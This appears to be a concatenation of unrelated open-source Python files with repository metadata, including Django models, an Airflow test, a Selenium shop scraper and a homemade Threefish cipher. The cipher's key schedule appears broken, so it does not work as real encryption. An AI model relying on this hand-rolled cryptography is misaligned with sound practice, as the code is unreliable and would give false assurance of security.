value = orig_buffer[value_index:value_index+value_len]
yield (name, value)
| mit | -4,779,798,032,722,320,000 | 32.74359 | 78 | 0.587082 | false | 4.086957 | false | false | false |
kajala/citizenmatch-backend | users/migrations/0001_initial.py | 1 | 2727 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-28 20:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0007_alter_validators_add_error_messages'),
('environment', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=64, unique=True)),
],
),
migrations.CreateModel(
name='LanguageSkill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.SmallIntegerField(choices=[(1, 'Basics'), (2, 'Intermediate'), (3, 'Fluent'), (4, 'Native')])),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Language')),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='profile', serialize=False, to=settings.AUTH_USER_MODEL)),
('role', models.CharField(choices=[('A', 'Admin'), ('R', 'Refugee'), ('M', 'Mentor')], db_index=True, max_length=1)),
('phone', models.CharField(blank=True, db_index=True, default='', max_length=32)),
('birth_year', models.IntegerField()),
('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),
('created', models.DateTimeField(blank=True, db_index=True, default=django.utils.timezone.now, editable=False)),
('last_modified', models.DateTimeField(auto_now=True, db_index=True)),
('city', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='environment.City')),
],
options={
'verbose_name': 'User profile',
'verbose_name_plural': 'User profiles',
},
),
migrations.AddField(
model_name='languageskill',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| mit | -8,973,948,334,469,795,000 | 45.220339 | 180 | 0.585992 | false | 4.082335 | false | false | false |
wndhydrnt/airflow | tests/ti_deps/deps/test_valid_state_dep.py | 15 | 1835 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from datetime import datetime
from mock import Mock
from airflow import AirflowException
from airflow.ti_deps.deps.valid_state_dep import ValidStateDep
from airflow.utils.state import State
class ValidStateDepTest(unittest.TestCase):
def test_valid_state(self):
"""
Valid state should pass this dep
"""
ti = Mock(state=State.QUEUED, end_date=datetime(2016, 1, 1))
self.assertTrue(ValidStateDep({State.QUEUED}).is_met(ti=ti))
def test_invalid_state(self):
"""
Invalid state should fail this dep
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
self.assertFalse(ValidStateDep({State.FAILED}).is_met(ti=ti))
def test_no_valid_states(self):
"""
If there are no valid states the dependency should throw
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
with self.assertRaises(AirflowException):
ValidStateDep({}).is_met(ti=ti)
| apache-2.0 | -8,289,935,792,905,820,000 | 34.980392 | 69 | 0.700817 | false | 3.963283 | true | false | false |
BUPT-OJ-V4/BOJ-V4 | problem/forms.py | 1 | 1986 | #encoding: utf-8
from django import forms
from django_select2.forms import ModelSelect2MultipleWidget
# from django.contrib.auth.models import Group
from .models import Problem, ProblemTag
from ojuser.models import GroupProfile
class ProblemForm(forms.ModelForm):
is_spj = forms.NullBooleanField(widget=forms.CheckboxInput(), initial=False)
tags = forms.ModelMultipleChoiceField(required=False, queryset=ProblemTag.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]))
groups = forms.ModelMultipleChoiceField(required=True, queryset=GroupProfile.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains'
]
))
class Meta:
model = Problem
exclude = ["superadmin", "is_checked", "created_time", "last_updated_time", "desc",
"code_length_limit"]
widgets = {
'groups': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]
),
'tags': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains'
]
)
}
def __init__(self, *args, **kwargs):
super(ProblemForm, self).__init__(*args, **kwargs)
self.fields['title'].label = u"题目"
self.fields['time_limit'].label = u"运行时间限制"
self.fields['memory_limit'].label = u"运行时间限制"
self.fields['groups'].label = u"所属用户组"
| mit | 3,346,247,374,446,407,700 | 36.461538 | 95 | 0.50308 | false | 4.87 | false | false | false |
cgcgbcbc/django-xadmin | xadmin/plugins/chart.py | 17 | 5683 |
import datetime
import decimal
import calendar
from django.template import loader
from django.http import HttpResponseNotFound
from django.core.serializers.json import DjangoJSONEncoder
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
from django.db import models
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _, ugettext
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, ListAdminView
from xadmin.views.dashboard import ModelBaseWidget, widget_manager
from xadmin.util import lookup_field, label_for_field, force_unicode, json
@widget_manager.register
class ChartWidget(ModelBaseWidget):
widget_type = 'chart'
description = _('Show models simple chart.')
template = 'xadmin/widgets/chart.html'
widget_icon = 'fa fa-bar-chart-o'
def convert(self, data):
self.list_params = data.pop('params', {})
self.chart = data.pop('chart', None)
def setup(self):
super(ChartWidget, self).setup()
self.charts = {}
self.one_chart = False
model_admin = self.admin_site._registry[self.model]
chart = self.chart
if hasattr(model_admin, 'data_charts'):
if chart and chart in model_admin.data_charts:
self.charts = {chart: model_admin.data_charts[chart]}
self.one_chart = True
if self.title is None:
self.title = model_admin.data_charts[chart].get('title')
else:
self.charts = model_admin.data_charts
if self.title is None:
self.title = ugettext(
"%s Charts") % self.model._meta.verbose_name_plural
def filte_choices_model(self, model, modeladmin):
return bool(getattr(modeladmin, 'data_charts', None)) and \
super(ChartWidget, self).filte_choices_model(model, modeladmin)
def get_chart_url(self, name, v):
return self.model_admin_url('chart', name) + "?" + urlencode(self.list_params)
def context(self, context):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.charts.items()],
})
# Media
def media(self):
return self.vendor('flot.js', 'xadmin.plugin.charts.js')
class JSONEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, (datetime.date, datetime.datetime)):
return calendar.timegm(o.timetuple()) * 1000
elif isinstance(o, decimal.Decimal):
return str(o)
else:
try:
return super(JSONEncoder, self).default(o)
except Exception:
return smart_unicode(o)
class ChartsPlugin(BaseAdminPlugin):
data_charts = {}
def init_request(self, *args, **kwargs):
return bool(self.data_charts)
def get_chart_url(self, name, v):
return self.admin_view.model_admin_url('chart', name) + self.admin_view.get_query_string()
# Media
def get_media(self, media):
return media + self.vendor('flot.js', 'xadmin.plugin.charts.js')
# Block Views
def block_results_top(self, context, nodes):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.data_charts.items()],
})
nodes.append(loader.render_to_string('xadmin/blocks/model_list.results_top.charts.html', context_instance=context))
class ChartsView(ListAdminView):
data_charts = {}
def get_ordering(self):
if 'order' in self.chart:
return self.chart['order']
else:
return super(ChartsView, self).get_ordering()
def get(self, request, name):
if name not in self.data_charts:
return HttpResponseNotFound()
self.chart = self.data_charts[name]
self.x_field = self.chart['x-field']
y_fields = self.chart['y-field']
self.y_fields = (
y_fields,) if type(y_fields) not in (list, tuple) else y_fields
datas = [{"data":[], "label": force_unicode(label_for_field(
i, self.model, model_admin=self))} for i in self.y_fields]
self.make_result_list()
for obj in self.result_list:
xf, attrs, value = lookup_field(self.x_field, obj, self)
for i, yfname in enumerate(self.y_fields):
yf, yattrs, yv = lookup_field(yfname, obj, self)
datas[i]["data"].append((value, yv))
option = {'series': {'lines': {'show': True}, 'points': {'show': False}},
'grid': {'hoverable': True, 'clickable': True}}
try:
xfield = self.opts.get_field(self.x_field)
if type(xfield) in (models.DateTimeField, models.DateField, models.TimeField):
option['xaxis'] = {'mode': "time", 'tickLength': 5}
if type(xfield) is models.DateField:
option['xaxis']['timeformat'] = "%y/%m/%d"
elif type(xfield) is models.TimeField:
option['xaxis']['timeformat'] = "%H:%M:%S"
else:
option['xaxis']['timeformat'] = "%y/%m/%d %H:%M:%S"
except Exception:
pass
option.update(self.chart.get('option', {}))
content = {'data': datas, 'option': option}
result = json.dumps(content, cls=JSONEncoder, ensure_ascii=False)
return HttpResponse(result)
site.register_plugin(ChartsPlugin, ListAdminView)
site.register_modelview(r'^chart/(.+)/$', ChartsView, name='%s_%s_chart')
| bsd-3-clause | -6,073,751,838,963,960,000 | 34.742138 | 136 | 0.604082 | false | 3.801338 | false | false | false |
Henrique1792/Trab1_EngSeg | threefish.py | 1 | 6409 | #Funções de bitwise:
#Como tivemos problemas de tipagem, utilizamos um tipo próprio para a criptografia
#No caso, um array de 1s e 0s representando bits.
#E, claro, tivemos que criar operadores pra agir sobre esse novo "tipo".
def xor( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] ^ b[i]
return result
def mod( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] & b[i]
return result
def add( a, b ):
result = [0] * 8
c = 0
for i in range( 7, -1, -1 ):
result[i] = ( a[i] ^ b[i] ) ^ c
c = ( ( a[i] | c ) & b[i] ) | ( a[i] & ( b[i] | c ) )
return result
def comp( a ):
return add( xor( a, [1,1,1,1,1,1,1,1]), [0,0,0,0,0,0,0,1])
def rol( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i - q ) >= 0:
result[ i - q ] = a[i]
else:
result[ 8 + i - q ] = a[i]
return result
def ror( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i + q ) < 8:
result[ i + q ] = a[i]
else:
result[ i + q - 8 ] = a[i]
return result
#Funções da criptografia em si:
def permute( v, c = True ):
p = { True: [2,1,4,7,6,5,0,3], False : [6,1,0,7,2,5,4,3] }
aux = [ v[i] for i in p[c] ]
return aux
def mix( x0, x1, j, d, c = True):
R = [[46,33,17,44,39,13,25,8],
[36,27,49,9,30,50,29,35],
[19,14,36,54,34,10,39,56],
[37,42,39,56,24,17,43,22]] #Mais constantes fixas da descrição do algorítmo
if( c ):
y0 = add( x0, x1 )
y1 = xor( rol( x1, R[j][d%8] ), y0 )
else:
y1 = ror( xor(x0, x1), R[j][d%8] )
y0 = add(x0, comp( y1 ) ) #sub = add( a, ~b )
return y0, y1
def key_schedule( k, t ):
ks = []
kn = to_bit( 0x1BD11BDAA9FC1A22.to_bytes( 8, "big" ) ) #Tem um pq dessa constante em específico no pdf do algorítmo. É basicamente um nothing-up-my-sleeve number.
for i in range( 7 ): #Nw - 1
kn = xor( kn[0], k[i])
t2 = xor( t[1], t[2] )
t.extend(t2)
k.extend(kn)
for i in range( 19 ): #Nr/4 + 1
s = [None] * 8
for j in range( 5 ):
s[j] = k[ ( i + j ) % 9 ]
s[5] = add( k[ ( i + 5 ) % 9 ], t[ i % 3 ] )
s[6] = add( k[ ( i + 6 ) % 9 ], t[ ( i + 1 ) % 3 ] )
s[7] = add( k[ ( i + 7 ) % 9 ], to_bit( [i] )[0] )
ks.append( s )
return ks
#Algoritmo implementado a partir das instruções oficiais, disponiveis em:
#https://www.schneier.com/academic/paperfiles/skein1.3.pdf
#Nossa sugestão para melhorar seria adicionar um timestamp junto a mensagem a ser cifrada, que seria análisado pela aplicação.
#Isso impediria cópias de mensagens sniffadas.
def Threefish( w, k, t, c = True ):
w = to_bit( w )
k = to_bit( k )
t = to_bit( t )
ks = key_schedule( k, t )
result = []
for k in range( 0, len( w ), 8 ):
block = w[k:k+8]
if( c ):
for i in range( 72 ):
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], ks[int( i/4 )][j] )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, True )
block = permute( block, True )
else:
for i in range( 71, -1, -1 ):
block = permute( block, False )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, False )
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], comp( ks[int( i/4 )][j] ) )
result.extend( block )
if c:
return from_bit( result )
else:
padwan = ""
for digit in from_bit( result ):
padwan += chr( digit )
return pad( padwan, False )
#Abaixo, funções de conversão de string/int para um vetor de bits.
#Por problemas de tipagem, bytes davam erro no endereçamento, strings nas operações, e inteiros no numero de casas.
#(BTW, a função nativa bin() retorna uma string, por isso tive q fazer na mão)
#Esse ficou bonito ;)
def to_bit( data ):
if( isinstance( data, str ) ):
data = pad( data )
data = [ ord( data[i] ) for i in range( len( data ) ) ]
return [ [0] * ( 8 - len( bin( datum )[2:] ) ) + [ 1 if digit=='1' else 0 for digit in bin( datum )[2:] ] for datum in data ]
#Esse nem tanto =/
def from_bit( data ):
result = []
for datum in data:
c = 0
for i in range( 8 ):
c += datum[ 7 - i ] << i
result.append( c )
return result
#Padding especial que eu vi por aí mas não lembro o nome
#Adiciona como algarismo de pad o numero de casas cobertas, assim nunca exclui um caractér errado
#(Exceto caso a frase termine com um "1" e seja múltiplo de 8. Mas é bem mais border q acabar com 0, dos pads normais)
def pad( w, c = True):
result = w * 1
if c:
i = 8 - ( len( result ) % 8 )
if i < 8:
result += str(i) * i
else:
try:
p = int( result[-1] )
for i in range( -1, -p - 1, -1 ):
if( int( result[ i ] ) != p ):
raise
result = result[:-p]
except:
return result #Falha no padding
return result
def example_use( w = "Frase de Exemplo", k = "gurulhu!", t = "oi"):
print("Plaintext: ", w, "\nKey: ", k, "\nTweak: ", t )
cy = Threefish( w, k, t )
print("\nCypher:", [ chr( i ) for i in cy] )
cy = Threefish( cy, k, t, False )
print("\nResult: ", cy )
if __name__ == "__main__":
import sys
if len( sys.argv ) < 5:
print("Usage: threefish [plaintext] [key] [tweak] [encript]")
else:
if( sys.argv[4] in ["FALSE", "False", "false", "F", "f", "0", "D", "U", "d", "u", 0] ):
with open( sys.argv[1] ) as plainfile:
plaintext = [ int( c ) for c in plainfile.readlines() ]
print( Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3], c = False ) )
else:
with open( sys.argv[1] ) as plainfile:
plaintext = plainfile.read()
[ print( c ) for c in Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3] ) ]
| gpl-3.0 | 1,621,412,275,519,312,100 | 32.387435 | 166 | 0.488317 | false | 2.660409 | false | false | false |
brkrishna/freelance | getpopulrrewards_com/parser.py | 1 | 9007 | # -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: parser
# Purpose:
#
# Author: Ramakrishna
#
# Created: 08/09/2015
# Copyright: (c) Ramakrishna 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
import sqlite3, time
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup, SoupStrainer
import urllib
BASE_URL = 'https://www.getpopulrrewards.com'
def main():
conn = driver = None
try:
driver = webdriver.Firefox()
conn = sqlite3.connect("gppr.db3")
cur = conn.cursor()
cur.execute("select id, catg, subcatg from links where done = 0 order by id")
review_urls = cur.fetchall()
driver.get('https://www.getpopulrrewards.com')
time.sleep(3)
for url in review_urls:
id = url[0]
catg = url[1]
subcatg = url[2]
next_page = ''
print catg, subcatg
try:
driver.find_element_by_link_text('SHOP ALL').click()
time.sleep(1)
driver.find_element_by_link_text(catg).click()
time.sleep(1)
driver.find_element_by_link_text(subcatg).click()
time.sleep(1)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
try:
main_window = driver.current_window_handle
try:
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
else:
next_page = '' # empty string as we want it to loop through the first page
except NoSuchElementException as e:
next_page = ''
print(e.__doc__)
print(e.args)
pass
while next_page != None:
links = driver.find_elements_by_class_name("shortDescription")
time.sleep(1)
for link in links:
name = points = item_no = prod_url = descr = notes = None
elem = link.find_element_by_tag_name('a')
elem.send_keys(Keys.CONTROL + Keys.RETURN)
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)
time.sleep(1)
second_window = driver.current_window_handle
driver.switch_to_window(second_window)
soup = BeautifulSoup(driver.page_source, parse_only=SoupStrainer('body'))
if soup != None:
try:
div_name = soup.find('span', {'id':'itemName'})
if div_name != None:
name = div_name.text.strip()
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "name not found"
pass
try:
div_item_no = soup.find('span', {'id':'itemNo'})
if div_item_no != None:
item_no = div_item_no.text
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item no not found"
pass
selected = soup.find('div', {'state':'selected'})
if selected != None:
url = selected['style']
prod_url = url[url.find("https"):url.find("?")]
#Save image locally
urllib.urlretrieve(prod_url, "images/" + item_no + ".jpg")
try:
desc = soup.find('div', {'id':'itemDescr'})
if desc != None:
descr = desc.getText("$$$")
'''
for d in desc.contents:
if d != None:
d = str(d)
descr += d.strip() if d != None else ''
'''
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "desc not found"
pass
'''
try:
note = soup.find('div', {'class':'itemSummary'})
if note != None:
note = note.contents
for n in note:
n = n.text.encode('ascii', 'ignore').decode('ascii').replace('\n','').strip()
notes += n + " "
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item summary not found"
pass
'''
try:
div_points = soup.find_all('p', {'class':'points'})
if div_points != None:
for p in div_points:
if p.text.strip() != '':
points = p.text.strip()
break
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "points not found"
pass
sql = "insert into records(name, catg, subcatg, points, item_no, img_url, descr) values (?,?,?,?,?,?,?)"
#print name, catg, subcatg, points, item_no, prod_url, descr
print catg, subcatg, name
if name != None and points != None and item_no != None and prod_url != None:
cur.execute(sql, (name, catg, subcatg, points, item_no, prod_url, descr))
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')
time.sleep(1)
driver.switch_to_window(main_window)
cur.execute("update links set done = 1 where id = ? and done = 0", (str(id),))
conn.commit()
try:
next_page = None
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
next_page.click()
else:
next_page = None
except IndexError as e:
print(e.__doc__)
print(e.args)
pass
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
driver.switch_to_window(main_window)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
if conn != None:
conn.commit()
conn.close()
if driver != None:
driver.close()
if __name__ == '__main__':
main()
| gpl-2.0 | 3,739,803,283,532,826,000 | 40.316514 | 132 | 0.375597 | false | 5.239674 | false | false | false |
chrigl/docker-library | plone-chrigl-debian/src/collective.geo.file/collective/geo/file/setuphandlers.py | 1 | 2357 | import logging
from zope.interface import alsoProvides
from Products.CMFPlone.utils import getToolByName
from Products.MimetypesRegistry.MimeTypeItem import MimeTypeItem
from collective.geo.file.interfaces import IGisFile
# The profile id of your package:
PROFILE_ID = 'profile-collective.geo.file:default'
gis_mimetypes = [
{'name': 'application/vnd.google-earth.kml+xml',
'extensions': ('kml',),
'globs': ('*.kml',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/vnd.google-earth.kml+xml',)},
{'name': 'application/gpx+xml',
'extensions': ('gpx',),
'globs': ('*.gpx',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/gpx+xml',)}
]
def do_nothing(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
logger.info("Empty upgrade step")
def attach_igisfile(context, logger=None):
catalog = getToolByName(context, 'portal_catalog')
brains = catalog(portal_type='File')
for brain in brains:
ob = brain.getObject()
mimetype = ob.content_type
if mimetype in ['application/vnd.google-earth.kml+xml',
'application/gpx+xml']:
if not IGisFile.providedBy(ob):
alsoProvides(ob, IGisFile)
reindex = True
def add_extract_menue(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
setup = getToolByName(context, 'portal_setup')
setup.runImportStepFromProfile(PROFILE_ID, 'actions')
def import_various(context):
"""Import step for configuration that is not handled in xml files.
"""
# Only run step if a flag file is present
if context.readDataFile('collective.geo.file-default.txt') is None:
return
logger = context.getLogger('collective.geo.file')
site = context.getSite()
mimetypes_registry = getToolByName(site, 'mimetypes_registry')
all_mimetypes = mimetypes_registry.list_mimetypes()
for mtype in gis_mimetypes:
if mtype['name'] not in all_mimetypes:
logger.info('Registering mimetype %s' % mtype['name'])
mimetypes_registry.register(MimeTypeItem(**mtype))
| apache-2.0 | 6,949,837,277,970,015,000 | 33.661765 | 71 | 0.660585 | false | 3.659938 | false | false | false |
meawoppl/babyfood | babyfood/components/SMAResistor.py | 1 | 1557 | # From https://www.digikey.com/Web%20Export/Supplier%20Content/Vishay_8026/PDF/VishayBeyschlag_SolderPad.pdf?redirected=1
from babyfood.pcb.PCBUnits import mil
from babyfood.features.basic import CenteredRectangle, FilledCenteredRectangle
from babyfood.components.ABC import AbstractSMAComponent
resistorsParams = {
"0102": (0.65, 1.10, 1.40, 2.85),
"0204": (1.50, 1.25, 1.75, 4.00),
"0207": (2.80, 2.20, 2.20, 7.20),
"0402": (0.25, 0.60, 0.55, 1.45),
"0603": (0.50, 0.95, 0.95, 2.40),
"0805": (0.65, 1.10, 1.40, 2.85),
"1206": (1.50, 1.25, 1.75, 4.00)}
class SMAResistor(AbstractSMAComponent):
def __init__(self, codeString):
# Names on datasheet ref'ed above
_g, _y, _x, _z = resistorsParams[codeString]
# Names useful to us
self._w = _y
self._h = _x
shift = (_g / 2) + (_y / 2)
self._outline = int(codeString[0:2]) * 0.254, int(codeString[2:4]) * 0.254
print(self._outline)
self._centers = ((-shift, 0),
(+shift, 0))
def draw(self, ctx):
pad = FilledCenteredRectangle(self._w, self._h)
mask = FilledCenteredRectangle(self._w - 0.1, self._h - 0.1)
outline = CenteredRectangle(*self._outline)
ctx.setActiveLayer("overlay")
outline.draw(ctx)
for cp in self._centers:
with ctx.transform.translation(*cp):
ctx.setActiveLayer("copper")
pad.draw(ctx)
ctx.setActiveLayer("mask")
mask.draw(ctx)
| bsd-2-clause | 642,509,527,637,811,000 | 32.12766 | 121 | 0.574181 | false | 2.91573 | false | false | false |
cathyyul/sumo | tools/output/analyze_teleports.py | 2 | 2656 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file analyze_teleports.py
@author Jakob Erdmann
@date 2012-11-20
@version $Id: analyze_teleports.py 14425 2013-08-16 20:11:47Z behrisch $
Extract statistics from the warning outputs of a simulation run for plotting.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2008-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os,sys
import re
from collections import defaultdict
def parse_log(logfile, edges=True, aggregate=3600):
print "Parsing %s" % logfile
reFrom = re.compile("lane='([^']*)'")
reTime = re.compile("time=(\d*)\.")
# counts per lane
waitingCounts = defaultdict(lambda:0)
collisionCounts = defaultdict(lambda:0)
# counts per step
waitingStepCounts = defaultdict(lambda:0)
collisionStepCounts = defaultdict(lambda:0)
for line in open(logfile):
try:
if "Warning: Teleporting vehicle" in line:
edge = reFrom.search(line).group(1)
time = reTime.search(line).group(1)
if edges:
edge = edge[:-2]
if "collision" in line:
collisionCounts[edge] += 1
collisionStepCounts[int(time) / aggregate] += 1
else:
waitingCounts[edge] += 1
waitingStepCounts[int(time) / aggregate] += 1
except:
print sys.exc_info()
sys.exit("error when parsing line '%s'" % line)
return (waitingCounts, collisionCounts,
waitingStepCounts, collisionStepCounts)
def print_counts(countDict, label):
counts = [(v,k) for k,v in countDict.items()]
counts.sort()
print counts
print label, 'total:', sum(countDict.values())
def main(logfile):
waitingCounts, collisionCounts, waitingStepCounts, collisionStepCounts = parse_log(logfile)
print_counts(waitingCounts, 'waiting')
print_counts(collisionCounts, 'collisions')
# generate plot
min_step = min(min(waitingStepCounts.keys()),
min(collisionStepCounts.keys()))
max_step = max(max(waitingStepCounts.keys()),
max(collisionStepCounts.keys()))
plotfile = logfile + '.plot'
with open(plotfile, 'w') as f:
f.write("# plot '%s' using 1:2 with lines title 'waiting', '%s' using 1:3 with lines title 'collisions'\n" % (
plotfile, plotfile))
for step in range(min_step, max_step + 1):
print >>f, ' '.join(map(str,[step, waitingStepCounts[step], collisionStepCounts[step]]))
if __name__ == "__main__":
main(*sys.argv[1:])
| gpl-3.0 | 5,773,483,690,804,837,000 | 34.891892 | 118 | 0.617846 | false | 3.704324 | false | false | false |
trevor/calendarserver | txdav/caldav/datastore/scheduling/addressmapping.py | 1 | 3402 | ##
# Copyright (c) 2005-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet.defer import inlineCallbacks, returnValue
from twext.python.log import Logger
from twistedcaldav.config import config
from twistedcaldav.memcacher import Memcacher
from txdav.caldav.datastore.scheduling.caldav.delivery import ScheduleViaCalDAV
from txdav.caldav.datastore.scheduling.cuaddress import RemoteCalendarUser, EmailCalendarUser, InvalidCalendarUser
from txdav.caldav.datastore.scheduling.delivery import DeliveryService
from txdav.caldav.datastore.scheduling.imip.delivery import ScheduleViaIMip
from txdav.caldav.datastore.scheduling.ischedule.delivery import ScheduleViaISchedule
__all__ = [
"ScheduleAddressMapper",
"mapper",
]
log = Logger()
"""
Handle mapping a calendar user address to a schedule delivery type.
"""
class ScheduleAddressMapper(object):
"""
Class that maps a calendar user address into a delivery service type.
"""
def __init__(self):
# We are going to cache mappings whilst running
self.cache = Memcacher("ScheduleAddressMapper", no_invalidation=True)
@inlineCallbacks
def getCalendarUser(self, cuaddr):
# Get the type
cuaddr_type = (yield self.getCalendarUserServiceType(cuaddr))
if cuaddr_type == DeliveryService.serviceType_caldav:
returnValue(InvalidCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_ischedule:
returnValue(RemoteCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_imip:
returnValue(EmailCalendarUser(cuaddr))
else:
returnValue(InvalidCalendarUser(cuaddr))
@inlineCallbacks
def getCalendarUserServiceType(self, cuaddr):
# Try cache first
cuaddr_type = (yield self.cache.get(str(cuaddr)))
if cuaddr_type is None:
serviceTypes = (ScheduleViaCalDAV,)
if config.Scheduling[DeliveryService.serviceType_ischedule]["Enabled"]:
serviceTypes += (ScheduleViaISchedule,)
if config.Scheduling[DeliveryService.serviceType_imip]["Enabled"]:
serviceTypes += (ScheduleViaIMip,)
for service in serviceTypes:
matched = (yield service.matchCalendarUserAddress(cuaddr))
if matched:
yield self.cache.set(str(cuaddr), service.serviceType())
returnValue(service.serviceType())
returnValue(cuaddr_type)
def isCalendarUserInMyDomain(self, cuaddr):
# Check whether it is a possible local address
def _gotResult(serviceType):
return serviceType == DeliveryService.serviceType_caldav
d = self.getCalendarUserServiceType(cuaddr)
d.addCallback(_gotResult)
return d
mapper = ScheduleAddressMapper()
| apache-2.0 | 3,453,919,102,478,652,000 | 33.714286 | 114 | 0.71017 | false | 4.123636 | false | false | false |
RachelJMorris/Text-to-Speech-projects | HowToUseEspeak/main.py | 3 | 1040 | # Run with Python 3
# install python3-espeak
# /usr/lib/python3/dist-packages/espeak/espeak.py
from espeak import espeak
import sys
done = False
while ( done == False ):
print()
print( "1. Display voices" )
print( "2. Speak text" )
print( "3. View espeak functions" )
choice = int( input( "What do you want to do? >> " ) )
print()
if ( choice == 1 ):
print( "VOICES" )
voices = espeak.list_voices()
print( "Identifier","Name","Gender","Age","Variant" )
for voice in voices:
print( "Name: ", voice.name )
print( "Identifier: ", voice.identifier )
print( "Gender: ", voice.gender )
print( "Age: ", voice.age )
print( "Variant: ", voice.variant )
print()
elif ( choice == 2 ):
print( "SPEAK" )
voice = input( "What voice do you want to use? >> " )
espeak.set_voice( voice )
text = input( "What do you want to say? >> " )
print( "Saying \"" + text + "\"" )
espeak.synth( text )
elif ( choice == 3 ):
print( "FUNCTIONS" )
for member in dir( espeak ):
print( member )
| mit | -700,674,754,371,552,100 | 21.12766 | 55 | 0.597115 | false | 2.773333 | false | false | false |
kevinmel2000/sl4a | python/src/Lib/test/test_undocumented_details.py | 56 | 1137 | from test.test_support import run_unittest, have_unicode
import unittest
import sys
class TestImplementationComparisons(unittest.TestCase):
def test_type_comparisons(self):
self.assertTrue(str < int or str > int)
